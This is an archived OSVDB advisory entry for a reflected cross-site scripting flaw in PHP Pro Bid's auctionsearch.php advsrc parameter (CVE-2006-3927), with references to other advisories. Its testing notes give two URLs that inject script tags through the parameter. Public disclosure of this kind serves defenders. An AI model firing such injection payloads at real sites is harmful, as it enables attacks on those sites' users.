PHP Pro Bid auctionsearch.php advsrc Variable XSS

2006-07-25T11:49:17
ID OSVDB:27544
Type osvdb
Reporter Ellipsis Security(securityconnection@gmail.com)
Modified 2006-07-25T11:49:17

Description

Manual Testing Notes

http://[target]/auctionsearch.php?advsrc="<script>alert(/EllipsisSecurityTest/)</script> http://[target]/auctionsearch.php?start=1&advsrc="><script>alert(/EllipsisSecurityTest/)</script>

References:

Vendor URL: http://www.phpprobid.com/ Secunia Advisory ID:21201 Related OSVDB ID: 27545 Related OSVDB ID: 27546 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0474.html CVE-2006-3927 Bugtraq ID: 19158